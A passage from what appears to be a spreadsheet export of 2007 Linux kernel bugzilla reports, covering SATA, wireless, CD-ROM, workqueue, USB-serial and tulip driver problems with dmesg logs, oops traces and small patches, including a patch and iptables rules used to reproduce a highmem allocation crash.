0x0000000000000000 irq 1276 ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata1.00: ATA-7: WDC WD740ADFD-00NLR1, 20.07P20, max UDMA/133 ata1.00: 145226112 sectors, multi 16: LBA48 NCQ (not used) ata1.00: configured for UDMA/133 ata2: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata2.00: qc timeout (cmd 0xec) ata2.00: failed to IDENTIFY (I/O error, err_mask=0x5) ata2: port is slow to respond, please be patient (Status 0x80) ata2: COMRESET failed (errno=-16) ata2: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata2.00: ATA-6: Config Disk, RGL10364, max UDMA/133 ata2.00: 640 sectors, multi 1: LBA ata2.00: 312581808 sectors, multi 1: LBA48 with attached drive it looks like this (just diffed dmsg with and without attached hdd) scsi0 : ahci scsi1 : ahci scsi2 : ahci scsi3 : ahci ata1: SATA max UDMA/133 cmd 0xffffc20001738900 ctl 0x0000000000000000 bmdma 0x0000000000000000 irq 1276 ata2: SATA max UDMA/133 cmd 0xffffc20001738980 ctl 0x0000000000000000 bmdma 0x0000000000000000 irq 1276 ata3: SATA max UDMA/133 cmd 0xffffc20001738a00 ctl 0x0000000000000000 bmdma 0x0000000000000000 irq 1276 ata4: SATA max UDMA/133 cmd 0xffffc20001738a80 ctl 0x0000000000000000 bmdma 0x0000000000000000 irq 1276 ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata1.00: ATA-7: WDC WD740ADFD-00NLR1, 20.07P20, max UDMA/133 ata1.00: 145226112 sectors, multi 16: LBA48 NCQ (not used) ata1.00: configured for UDMA/133 ata2: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata2.00: ATA-6: External Disk 0, RGL10364, max UDMA/133 ata2.00: 312581808 sectors, multi 1: LBA48 ata2.00: configured for UDMA/133 Steps to reproduce: Boot without SATA Drive on 3rd SATA connector. complete dmsg with attached disk on port 3 can be found here: http://paste.olausson.de/1d9d9f9194.html complete dmsg without disk on port 3 can be found here: http://paste.olausson.de/2db6f76723.html Thanks and regards Bjoern Olausson</t>
  </si>
  <si>
    <t>poor connection with broadcom 4306rev02, native 43xx driver</t>
  </si>
  <si>
    <t>kernel 2.6.21+</t>
  </si>
  <si>
    <t>2007-08-23 02:03 UTC</t>
  </si>
  <si>
    <t>Bodo Graumann</t>
  </si>
  <si>
    <t>2007-08-28 10:07 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.20 Distribution: Gentoo Hardware Environment: broadcom 4306 rev02 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 3800+ Software Environment: Gentoo Base System release 1.12.9 gcc-4.1.2, glibc-2.5-r4 Problem Description: kernel 2.6.20 and earlier with gentoo patchset + ndiswrapper and kernel 2.6.20 with gentoo patchset + bcm43xx driver: wirelesscard worked perfectly kernel 2.6.21, 2.6.22 with gentoo-patchset + bcm43xx driver: poor connection, 10kbit downstream, several seconds ping time when loading many things at once through the connection notice: in the testings I noticed, that rebooting is the only way (ok I didn't try to wait several hours) to revise the problem. so when I start firefox, with many pages loading at once, it doesn't help to stop the loading, close the tabs, close firefox or even restart the init-service. only after a reboot everything works again. kernel 2.6.23_rc2 (plain vanilla) with bcm43xx driver: device doesn't work at all With patches from ftp://lwfinger.dynalias.org/patches which creates a bcm4301 driver, that should work with my card according to http://lists.berlios.de/pipermail/bcm43xx-dev/2007-July/005095.html : kernel 2.6.22 with gentoo-patchset + bcm4301 driver: kernelpanic on boot kernel 2.6.23_rc2 (plain vanilla) with bcm4301 driver: System hangs when trying to get up the interface (through init-script) For more info see original report at: https://bugs.gentoo.org/show_bug.cgi?id=188077 and this seems to be a similar bug report: https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/124159</t>
  </si>
  <si>
    <t>(ata_piix) Repeated CDROM device timeouts when no disk in tray</t>
  </si>
  <si>
    <t>2.6.22.2-42.fc6</t>
  </si>
  <si>
    <t>2007-08-23 02:05 UTC</t>
  </si>
  <si>
    <t>D. Angelis</t>
  </si>
  <si>
    <t>2008-02-07 00:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.20-1.2962.fc6 Distribution: FC6 Hardware Environment: Clevo 570U laptop CPU = Intel(R) Core(TM)2 CPU T7200 @ 2.00GHz SATA Controler = ICH7M Hard Disk= ata1.00 : ATA-7: ST9100824AS, 3.04, max UDMA/133 CDROM= ata2.01 : ATAPI: TSSTcorpCD/DVDW TS-L632D, TI03, max UDMA/33 Software Environment: Problem Description: With kernels 2.6.22.1 and newer I get repeated timeout messages for the CDROM device like the following : ata2.01: qc timeout (cmd 0xa0) ata2.01: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.01: cmd a0/00:00:00:00:20/00:00:00:00:00/b0 tag 0 cdb 0x0 data 0 ata2: port is slow to respond, please be patient (Status 0xd0) ata2: device not ready (errno=-16), forcing hardreset ata2: soft resetting port ata2.01: configured for UDMA/33 ata2: EH complete It only happens when there is no disk in the CD tray. I will attach full dmesg log and lspci -nnvvvxxxx Steps to reproduce: Boot any kernel newer than 2.6.22.1 and just keep the CD tray empty.</t>
  </si>
  <si>
    <t>PROBLEM: Kernel oops during interrupt context memory allocation</t>
  </si>
  <si>
    <t>2007-08-23 05:16 UTC</t>
  </si>
  <si>
    <t>Thomas Jarosch</t>
  </si>
  <si>
    <t>2009-03-23 11:32 UTC</t>
  </si>
  <si>
    <t>Hey there, I've found a problem in the kernel memory handler which can be triggered by netfilter modules allocating memory in interrupt context. The bug results in a hard crash from time to time. It only happens on machines using highmem, so you need at least 2 GB RAM. Here are three easy steps to force the problem: 1. Apply the following patch on a box with 2+ GB RAM: diff -u linux-2.6.23.clean/net/netfilter/xt_comment.c linux-2.6.23/net/netfilter/xt_comment.c --- linux-2.6.23.clean/net/netfilter/xt_comment.c Thu Aug 23 11:55:47 2007 +++ linux-2.6.23/net/netfilter/xt_comment.c Thu Aug 23 11:45:44 2007 @@ -25,6 +25,13 @@ unsigned int protooff, bool *hotdrop) { + unsigned long mem; + if ((mem = get_zeroed_page(GFP_ATOMIC)) == 0) { + printk("ipt_comment: Out of memory!\n"); + } else { + free_page(mem); + } + /* We always match */ return true; } 2. Insert the following netfilter rules: iptables -I INPUT -m comment --comment "crash" iptables -I OUTPUT -m comment --comment "crash" 3. Download something big The box will oops within seconds. Before I figured out this easy way to reproduce it, I wrote an extra netfilter module called ipt_CRASH doing get_zeroed_page(GFP_ATOMIC)/free_page(). Here's a backtrace of the oops with kernel 2.6.23-rc3 using the default config and ipt_CRASH: ------------[ cut here ]------------ kernel BUG at arch/i386/mm/highmem.c:38! invalid opcode: 0000 [#1] Modules linked in: ipt_CRASH iptable_filter ip_tables x_tables deflate zlib_deflate twofish twofish_common serpent blowfish des cbc ecb blkcipher aes xcbcd CPU: 0 EIP: 0060:[&lt;c011401f&gt;] Not tainted VLI EFLAGS: 00010286 (2.6.23-rc3 #1) EIP is at kmap_atomic_prot+0x24/0x83 eax: 0000000c ebx: c16eba60 ecx: c0002edc edx: 00000003 esi: 00000163 edi: 00000001 ebp: c16eba60 esp: f75f1b9c ds: 007b es: 007b fs: 0000 gs: 0000 ss: 0068 Process info_iponline (pid: 3469, ti=f75f0000 task=f7269ab0 task.ti=f75f0000) Stack: c16eba60 00000000 c013c695 00000001 00000044 40000000 00000001 00000000 00028020 c0327a3c c0327648 00000000 00000001 00000000 00000001 00000000 00008020 00008020 00000000 c0327a38 c013c778 00000044 63d210ac 00000000 Call Trace: [&lt;c013c695&gt;] get_page_from_freelist+0x1ed/0x284 [&lt;c013c778&gt;] __alloc_pages+0x4c/0x282 [&lt;c013ca31&gt;] get_zeroed_page+0x3c/0x4a [&lt;f894e000&gt;] ipt_crash_target+0x0/0x48 [ipt_CRASH] [&lt;f894e012&gt;] ipt_crash_target+0x12/0x48 [ipt_CRASH] [&lt;f8958331&gt;] ipt_do_table+0x26d/0x2c8 [ip_tables] [&lt;c0258484&gt;] nf_iterate+0x38/0x6a [&lt;c02585ed&gt;] nf_hook_slow+0x4d/0xb5 [&lt;c025d1b3&gt;] ip_local_deliver_finish+0x0/0x16b [&lt;c025d85c&gt;] ip_local_deliver+0x72/0x1ea [&lt;c025d1b3&gt;] ip_local_deliver_finish+0x0/0x16b [&lt;c025d7bd&gt;] ip_rcv+0x3fb/0x428 [&lt;c01287c4&gt;] getnstimeofday+0x2b/0xaf [&lt;c0127776&gt;] ktime_get_real+0xf/0x2b [&lt;c024540c&gt;] netif_receive_skb+0x219/0x269 [&lt;f8998fa0&gt;] e1000_clean_rx_irq+0x35a/0x42a [e1000] [&lt;f8998c46&gt;] e1000_clean_rx_irq+0x0/0x42a [e1000] [&lt;f8997f88&gt;] e1000_clean+0x304/0x4ae [e1000] [&lt;c014f745&gt;] get_unused_fd_flags+0x42/0xaa [&lt;c0161327&gt;] mntput_no_expire+0x11/0x47 [&lt;c01580c1&gt;] __link_path_walk+0x83f/0x9de [&lt;c01394cc&gt;] do_generic_mapping_read+0x3cd/0x3d5 [&lt;c02471ff&gt;] net_rx_action+0x52/0xe9 [&lt;c011b83c&gt;] __do_softirq+0x35/0x75 [&lt;c011b89e&gt;] do_softirq+0x22/0x26 [&lt;c0105e8c&gt;] do_IRQ+0x58/0x6c [&lt;c0138e42&gt;] find_lock_page+0x12/0x62 [&lt;c0104573&gt;] common_interrupt+0x23/0x28 [&lt;c0141996&gt;] __do_fault+0x136/0x2d1 [&lt;c0142eac&gt;] handle_mm_fault+0x2c5/0x571 [&lt;c0145665&gt;] vma_merge+0x120/0x178 [&lt;c0113560&gt;] do_page_fault+0x212/0x58a [&lt;c011334e&gt;] do_page_fault+0x0/0x58a [&lt;c0292f2a&gt;] error_code+0x6a/0x70 [&lt;c0290000&gt;] tpacket_rcv+0x142/0x38e ======================= Code: 03 05 00 eb 38 c0 c3 56 89 ce 53 89 c3 89 e0 25 00 e0 ff ff ff 40 14 8b 0d f0 17 38 c0 8d 04 95 00 00 00 00 29 c1 83 39 00 74 04 &lt;0f&gt; 0b eb fe 8b 03 EIP: [&lt;c011401f&gt;] kmap_atomic_prot+0x24/0x83 SS:ESP 0068:f75f1b9c Kernel panic - not syncing: Fatal exception in interrupt ------------------------------------ Link to my original report on linux-kernel: http://marc.info/?l=linux-kernel&amp;m=118764032022075 I tried to take a look at the problem myself, but it's way past my knowledge of the inner kernel workings. Thanks in advance, Thomas</t>
  </si>
  <si>
    <t>2.6.22.5</t>
  </si>
  <si>
    <t>duplicate forward declaration of void hostap_80211_rx in drivers/net/wireless/hostap/hostap_80211.h</t>
  </si>
  <si>
    <t>2007-08-23 06:33 UTC</t>
  </si>
  <si>
    <t>2008-02-10 22:37 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23-rc3 Distribution: vanilla kernel, 2.6.22 + 2.6.23-rc3 patch in drivers/net/wireless/hostap/hostap_80211.h the forward declaration of void hostap_80211_rx(struct net_device *dev, struct sk_buff *skb, struct hostap_80211_rx_status *rx_stats); is duplicate (occurs on lines 75/76 and 87/88)</t>
  </si>
  <si>
    <t>usb/serial/pl2303: support for BenQ Siemens Mobile Phone EF81</t>
  </si>
  <si>
    <t>2007-08-23 16:01 UTC</t>
  </si>
  <si>
    <t>Andreas Loibl</t>
  </si>
  <si>
    <t>2008-02-10 22:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian stable Hardware Environment: BenQ Siemens Mobile Phone EF81 connected via USB-cord Problem Description: pl2303 already supports some Siemens Mobile Phones (SX1, X65, X75, ...), but support for EF81 is missing, because its product ID is different from the others. Bus 001 Device 002: ID 11f5:0005 Siemens AG (?) idVendor 0x11f5 Siemens AG (?) idProduct 0x0005 iManufacturer 1 BenQ Siemens iProduct 2 BenQ Siemens Mobile Phone</t>
  </si>
  <si>
    <t>BUG prempt in workqueue.c</t>
  </si>
  <si>
    <t>2.6.22.5 + cfs20</t>
  </si>
  <si>
    <t>2007-08-25 03:38 UTC</t>
  </si>
  <si>
    <t>2007-09-06 10:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Slackware 12.0 Hardware Environment: Athlon64 3000, nForce3, Aspire 1511LMi Software Environment: linux/crash at boot Problem Description: I got once a kernel BUG at boot in workqueue.c, which blocked the computer. However, syslog had the time to log the following dump: -- parts of dmesg -- Aug 25 12:08:43 athor kernel: BIOS-e820: 0000000000000000 - 000000000009b800 (usable) Aug 25 12:08:43 athor kernel: BIOS-e820: 000000000009b800 - 00000000000a0000 (reserved) Aug 25 12:08:43 athor kernel: BIOS-e820: 00000000000d2000 - 0000000000100000 (reserved) Aug 25 12:08:43 athor kernel: BIOS-e820: 0000000000100000 - 000000004ff70000 (usable) Aug 25 12:08:43 athor kernel: BIOS-e820: 000000004ff70000 - 000000004ff7f000 (ACPI data) Aug 25 12:08:43 athor kernel: BIOS-e820: 000000004ff7f000 - 000000004ff80000 (ACPI NVS) Aug 25 12:08:43 athor kernel: BIOS-e820: 000000004ff80000 - 0000000050000000 (reserved) Aug 25 12:08:43 athor kernel: BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved) Aug 25 12:08:43 athor kernel: end_pfn_map = 1048576 Aug 25 12:08:43 athor kernel: ACPI: RSDP 000F6EA0, 0014 (r0 PTLTD ) Aug 25 12:08:43 athor kernel: ACPI: RSDT 4FF792FD, 0034 (r1 PTLTD RSDT 6040000 LTP 0) Aug 25 12:08:43 athor kernel: ACPI: FACP 4FF7EE3E, 0074 (r1 NVIDIA CK8 6040000 PTL_ F4240) Aug 25 12:08:43 athor kernel: ACPI: DSDT 4FF79331, 5B0D (r1 NVIDIA CK8 6040000 MSFT 100000E) Aug 25 12:08:43 athor kernel: ACPI: FACS 4FF7FFC0, 0040 Aug 25 12:08:43 athor kernel: ACPI: APIC 4FF7EEB2, 0050 (r1 NVIDIA NV_APIC_ 6040000 LTP 0) Aug 25 12:08:43 athor kernel: ACPI: SSDT 4FF7EF02, 00D6 (r1 PTLTD POWERNOW 6040000 LTP 1) Aug 25 12:08:43 athor kernel: ACPI: BOOT 4FF7EFD8, 0028 (r1 PTLTD $SBFTBL$ 6040000 LTP 1) Aug 25 12:08:43 athor kernel: Zone PFN ranges: Aug 25 12:08:43 athor kernel: DMA 0 -&gt; 4096 Aug 25 12:08:43 athor kernel: DMA32 4096 -&gt; 1048576 Aug 25 12:08:43 athor kernel: Normal 1048576 -&gt; 1048576 Aug 25 12:08:43 athor kernel: early_node_map[2] active PFN ranges Aug 25 12:08:43 athor kernel: 0: 0 -&gt; 155 Aug 25 12:08:43 athor kernel: 0: 256 -&gt; 327536 Aug 25 12:08:43 athor kernel: Built 1 zonelists. Total pages: 321465 Aug 25 12:08:43 athor kernel: Initializing CPU#0 Aug 25 12:08:43 athor kernel: PID hash table entries: 4096 (order: 12, 32768 bytes) Aug 25 12:08:43 athor kernel: Console: colour VGA+ 80x25 Aug 25 12:08:43 athor kernel: Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes) Aug 25 12:08:43 athor kernel: Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes) Aug 25 12:08:43 athor kernel: Checking aperture... Aug 25 12:08:43 athor kernel: CPU 0: aperture @ d8000000 size 128 MB Aug 25 12:08:43 athor kernel: Memory: 1282320k/1310144k available (3739k kernel code, 27060k reserved, 1679k data, 200k init) Aug 25 12:08:43 athor kernel: Calibrating delay using timer specific routine.. 3593.81 BogoMIPS (lpj=5 986903) Aug 25 12:08:43 athor kernel: Mount-cache hash table entries: 256 Aug 25 12:08:43 athor kernel: CPU: AMD Athlon 64 Processor 3000+ stepping 0a Aug 25 12:08:43 athor kernel: result 12467786 Aug 25 12:08:43 athor kernel: PCI: Bus #03 (-#06) is hidden behind bridge #02 (-#02) (try 'pci=assign -busses') Aug 25 12:08:43 athor kernel: Please report the result to linux-kernel to fix this permanently Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK1] (IRQs 16 17 18 19) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK2] (IRQs 16 17 18 19) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK3] (IRQs 16 17 18 19) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK4] (IRQs 16 17 18 19) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK5] (IRQs 16 17 18 19) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LSMB] (IRQs 20 21) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LUS0] (IRQs 20 21) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LUS1] (IRQs 20 21) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LUS2] (IRQs 20 21) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LMAC] (IRQs 20 21) *0, disabled. Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LACI] (IRQs 22) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LMCI] (IRQs 20 21) *0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LPID] (IRQs 20 21) *0, disabled. Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LTID] (IRQs 20 21) *0, disabled. Aug 25 12:08:43 athor kernel: PCI: Cannot allocate resource region 0 of device 0000:00:00.0 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK5] enabled at IRQ 19 Aug 25 12:08:43 athor kernel: PCI: Failed to allocate mem resource #10:4000000@d4000000 for 0000:02:07 .0 Aug 25 12:08:43 athor kernel: PCI: Bus 3, cardbus bridge: 0000:02:07.0 Aug 25 12:08:43 athor kernel: IO window: 00003000-000030ff Aug 25 12:08:43 athor kernel: IO window: 00003400-000034ff Aug 25 12:08:43 athor kernel: PREFETCH window: 60000000-63ffffff Aug 25 12:08:43 athor kernel: PCI: Failed to allocate mem resource #6:20000@f0000000 for 0000:01:00.0 Aug 25 12:08:43 athor kernel: PCI: Enabling device 0000:02:07.0 (0106 -&gt; 0107) Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK3] enabled at IRQ 18 Aug 25 12:08:43 athor kernel: IP route cache hash table entries: 65536 (order: 7, 524288 bytes) Aug 25 12:08:43 athor kernel: TCP established hash table entries: 262144 (order: 10, 4194304 bytes) Aug 25 12:08:43 athor kernel: TCP bind hash table entries: 65536 (order: 7, 524288 bytes) Aug 25 12:08:43 athor kernel: fuse init (API version 7.8) Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LMCI] enabled at IRQ 21 Aug 25 12:08:43 athor kernel: Marking TSC unstable due to possible TSC halt in C2 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK2] enabled at IRQ 17 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LNK4] enabled at IRQ 16 Aug 25 12:08:43 athor kernel: NFORCE3-150: BIOS didn't set cable bits correctly. Enabling workaround. Aug 25 12:08:43 athor kernel: hda: IC25N060ATMR04-0, ATA DISK drive Aug 25 12:08:43 athor kernel: ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Aug 25 12:08:43 athor kernel: hdc: MATSHITADVD-RAM UJ-820S, ATAPI CD/DVD-ROM drive Aug 25 12:08:43 athor kernel: ide1 at 0x170-0x177,0x376 on irq 15 Aug 25 12:08:43 athor kernel: NOTE: The dv1394 driver is unsupported and may be removed in a future Li nux release. Use raw1394 instead. Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LUS2] enabled at IRQ 20 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LUS0] enabled at IRQ 21 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LUS1] enabled at IRQ 20 Aug 25 12:08:43 athor kernel: psmouse.c: Failed to enable mouse on isa0060/serio1 Aug 25 12:08:43 athor kernel: ACPI: PCI Interrupt Link [LACI] enabled at IRQ 22 Aug 25 12:08:43 athor kernel: nf_conntrack version 0.5.0 (8192 buckets, 65536 max) Aug 25 12:08:43 athor kernel: ip_tables: (C) 2000-2006 Netfilter Core Team Aug 25 12:08:43 athor kernel: VFS: Mounted root (ext3 filesystem) readonly. -- fsck has not be done yet, since the fs is RO -- -- here is the bug, ho là là ! -- Aug 25 12:08:49 athor kernel: ------------[ cut here ]------------ Aug 25 12:08:49 athor kernel: kernel BUG at kernel/workqueue.c:258! Aug 25 12:08:49 athor kernel: invalid opcode: 0000 [1] PREEMPT Aug 25 12:08:49 athor kernel: CPU 0 Aug 25 12:08:49 athor kernel: Modules linked in: Aug 25 12:08:49 athor kernel: Pid: 4, comm: events/0 Not tainted 2.6.22.5-cfs-v20.3 #4 Aug 25 12:08:49 athor kernel: RIP: 0010:[&lt;ffffffff80240bea&gt;] [&lt;ffffffff80240bea&gt;] run_workqueue+0x13a /0x1a0 Aug 25 12:08:49 athor kernel: RSP: 0018:ffff81004ff0deb0 EFLAGS: 00010286 Aug 25 12:08:49 athor kernel: RAX: 0000000000000000 RBX: ffff81004eb776f0 RCX: 0000000000110c8c Aug 25 12:08:49 athor kernel: RDX: ffff81004c23dd70 RSI: ffff81004ff00040 RDI: ffff81004f50f790 Aug 25 12:08:49 athor kernel: RBP: ffff81004eb776e8 R08: ffff81004ff0c000 R09: 00000000ffffffff Aug 25 12:08:49 athor kernel: R10: 0000000000000093 R11: 00000000ffffffff R12: ffff81004ff671c0 Aug 25 12:08:49 athor kernel: R13: ffff81004eb776f8 R14: 0000000000000000 R15: 0000000000000000 Aug 25 12:08:49 athor kernel: FS: 00002aac2a0d0d30(0000) GS:ffffffff8074b000(0000) knlGS:000000000000 0000 Aug 25 12:08:49 athor kernel: CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b Aug 25 12:08:49 athor kernel: CR2: 00007fff8a62aef8 CR3: 000000004c7ab000 CR4: 00000000000006e0 Aug 25 12:08:49 athor kernel: Process events/0 (pid: 4, threadinfo ffff81004ff0c000, task ffff81004ff0 0040) Aug 25 12:08:49 athor kernel: Stack: ffffffff80241260 ffff81004ff671d0 ffff81004ff671c0 ffffffff80241 260 Aug 25 12:08:49 athor kernel: 0000000000000000 ffffffff80241323 0000000000000000 ffff81004ff00040 Aug 25 12:08:49 athor kernel: ffffffff80244cc0 ffff81004ff0def8 ffff81004ff0def8 0000000000000000 Aug 25 12:08:49 athor kernel: Call Trace: Aug 25 12:08:49 athor kernel: [&lt;ffffffff80241260&gt;] worker_thread+0x0/0x130 Aug 25 12:08:49 athor kernel: [&lt;ffffffff80241260&gt;] worker_thread+0x0/0x130 Aug 25 12:08:49 athor kernel: [&lt;ffffffff80241323&gt;] worker_thread+0xc3/0x130 Aug 25 12:08:49 athor kernel: [&lt;ffffffff80244cc0&gt;] autoremove_wake_function+0x0/0x30 Aug 25 12:08:49 athor kernel: [&lt;ffffffff80241260&gt;] worker_thread+0x0/0x130 Aug 25 12:08:49 athor kernel: [&lt;ffffffff8024485b&gt;] kthread+0x4b/0x80 Aug 25 12:08:49 athor kernel: [&lt;ffffffff8020a388&gt;] child_rip+0xa/0x12 Aug 25 12:08:49 athor kernel: [&lt;ffffffff80244810&gt;] kthread+0x0/0x80 Aug 25 12:08:49 athor kernel: [&lt;ffffffff8020a37e&gt;] child_rip+0x0/0x12 Aug 25 12:08:49 athor kernel: Aug 25 12:08:49 athor kernel: Aug 25 12:08:49 athor kernel: Code: 0f 0b eb fe 66 90 65 48 8b 34 25 00 00 00 00 8b 8e 38 01 00 Aug 25 12:08:49 athor kernel: RIP [&lt;ffffffff80240bea&gt;] run_workqueue+0x13a/0x1a0 Aug 25 12:08:49 athor kernel: RSP &lt;ffff81004ff0deb0&gt; -- forced to reboot here -- I only saw this bug once, while regtesting another bug (8934), with 2.6.22.5-cfs. 2.6.22 was used quite a lot before. 2.6.23-rc was booted several times also, without the problem, but I cannot quarantee anything. I still have the kernel image and System.map if you want. Steps to reproduce: Well, I got it only once, but it is in core components...</t>
  </si>
  <si>
    <t>Christophe Dumez</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000</t>
  </si>
  <si>
    <t>2007-08-25 09:47 UTC</t>
  </si>
  <si>
    <t>2008-02-10 23:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Kubuntu Gutsy Hardware Environment: Software Environment: Problem Description: I got this error message: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000 in dmesg output when connecting a USB device. Turning off CONFIG_SCSI_SCAN_ASYNC fixed the problem. Apparently there is a bug in SCSI core code. Steps to reproduce: I connected my MP4 player (which is not recognized) on USB.</t>
  </si>
  <si>
    <t>make deb-pkg should 'Provides: linux-image-$version' (as well)</t>
  </si>
  <si>
    <t>2007-08-26 07:08 UTC</t>
  </si>
  <si>
    <t>2007-10-19 20:54 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian Sarge/Etch Hardware Environment: x86 Software Environment: Problem Description: Debian's modules explicitly depend on 'linux-image-_KVERS_' while the in-tree .deb kernel packager sets the 'Provides:' field to 'kernel-image-_KVERS_'. Hence kernels packaged by deb-pkg fail dependencies check for Debian's modules .deb. I suggest to apply the following patch: --- scripts/package/builddeb.orig 2007-08-26 16:02:07.000000000 +0200 +++ scripts/package/builddeb 2007-08-26 15:58:47.000000000 +0200 @@ -83,7 +83,7 @@ Standards-Version: 3.6.1 Package: $packagename -Provides: kernel-image-$version +Provides: kernel-image-$version, linux-image-$version Architecture: any Description: User Mode Linux kernel, version $version User-mode Linux is a port of the Linux kernel to its own system call @@ -105,7 +105,7 @@ Standards-Version: 3.6.1 Package: $packagename -Provides: kernel-image-$version +Provides: kernel-image-$version, linux-image-$version Architecture: any Description: Linux kernel, version $version This package contains the Linux kernel, modules and corresponding other</t>
  </si>
  <si>
    <t>ICH7 SATA controller doesn't find hard drive on recent kernel versions</t>
  </si>
  <si>
    <t>2007-08-27 01:39 UTC</t>
  </si>
  <si>
    <t>Gaetan</t>
  </si>
  <si>
    <t>2008-06-14 18:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Ubuntu Feisty Hardware Environment: Gigabyte 945GM-S2 motherboard Software Environment: Linux version 2.6.20-15-generic Problem Description: Recent Kernel version doesn't find any hard drive on my SATA controler (ICH7 chipset). The 2.6.15 kernel finds the right hard drive and works perfectly, but every kernel version higher I've tried so far doesn't work : either it doesn't find any hard drive (no sd* device found in /etc), either (for Egdy) it does find the hard drive (with the partition), any attempt to write on it result at a system bug. I've tried several Linux Live CD (Egdy, Feisty, Parted Magic, Gutsy alpha 4, Mandriva). They all have recent kernel (ie, higher than 2.6.15), and the hard drive was not found. So for the moment, I'm using the kernel 2.6.15 (from Dapper) on Ubuntu Feisty and this works great. I've tried to compile my own kernel from kernel.org, but this didn't worked (root device not found at startup, perhaps a bad config). Please refere to Bug repport on Launchpad for complete dmesg + lspci and system info (Bug ID: 131696) : https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/131696 Steps to reproduce: - Start a recent Ubuntu Live CD (kernel 2.6.20 for Feisty) on a Gigabyte 945GM-S2 motherboard mothboard. - The connected SATA hard drive is not found by the ata_piix driver. Many thanks for your support, please tell me if you need more information for this issue.</t>
  </si>
  <si>
    <t>tulip driver oops in tulip_interrupt when hibernating with swsusp/suspend2</t>
  </si>
  <si>
    <t>2007-08-28 05:36 UTC</t>
  </si>
  <si>
    <t>kernelbugs</t>
  </si>
  <si>
    <t>2008-06-05 01:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: I think this may have appeared when I switched from 2.6.17.11 to 2.6.18.8. I was originally using suspend2 but switched to mainline swsusp to determine whether the problem occurred with it. Distribution: Debian sarge, x86 Hardware Environment: /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 1 cpu MHz : 599.825 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1200.83 clflush size : 32 /proc/ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:07.1 0170-0177 : ide1 01f0-01f7 : 0000:00:07.1 01f0-01f7 : ide0 02f8-02ff : serial 0376-0376 : 0000:00:07.1 0376-0376 : ide1 0378-037a : parport0 03c0-03df : vesafb 03f2-03f5 : floppy 03f6-03f6 : 0000:00:07.1 03f6-03f6 : ide0 03f7-03f7 : floppy DIR 03f8-03ff : serial 0cf8-0cff : PCI conf1 4000-4003 : ACPI PM1a_EVT_BLK 4004-4005 : ACPI PM1a_CNT_BLK 4008-400b : ACPI PM_TMR 4010-4015 : ACPI CPU throttle 4020-4023 : ACPI GPE0_BLK 5000-5007 : vt596_smbus d000-d00f : 0000:00:07.1 d000-d007 : ide0 d008-d00f : ide1 d400-d41f : 0000:00:07.2 d400-d41f : uhci_hcd dc00-dcff : 0000:00:0f.0 e000-e007 : 0000:00:12.0 e000-e007 : au8830 e400-e407 : 0000:00:12.0 e400-e407 : au8830 e800-e8ff : 0000:00:13.0 e800-e8ff : tulip ec00-ecff : 0000:00:14.0 ec00-ecff : tulip /proc/iomem: 00000000-0009ffff : System RAM 000a0000-000bffff 